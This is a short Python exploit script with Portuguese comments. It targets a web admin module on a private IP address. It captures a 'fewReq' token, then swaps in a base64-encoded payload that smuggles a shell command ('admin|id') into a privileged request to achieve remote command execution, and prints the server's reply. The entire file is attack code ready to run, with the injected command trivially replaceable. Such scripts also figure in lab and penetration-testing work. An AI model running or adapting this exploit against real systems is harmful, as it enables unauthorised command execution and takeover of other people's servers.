import requests import re import base64 # Configurações do alvo TARGET = "http://192.168.199.120:10000" USERNAME = "user" PASSWORD = "password" # Inicia uma sessão session = requests.Session() # *Passo 1: Mapeando Token (fewReq)* token_url = f"{TARGET}/module/admin.fe" response = session.get(token_url) # Extraindo o token com regex match = re.search(r"fewReq=:[A-Za-z0-9+=]+", response.text) if not match: print("[!] Token fewReq não encontrado.") exit() fewReq_original = match.group(0).split("=")[1] print(f"[+] Token original capturado: {fewReq_original}") # *Passo 2: Criando um novo payload com comando injetado* cmd = "id" # Comando para testar a execução payload = f"admin|{cmd}".encode() fewReq_encoded = base64.b64encode(payload).decode() # *Passo 3: Substituir fewReq na requisição privilegiada* exploit_url = f"{TARGET}/module/admin.fe?fewReq=:B:{fewReq_encoded}" exploit_response = session.get(exploit_url) print("[+] Exploit executado!") print("Resposta do servidor:") print(exploit_response.text)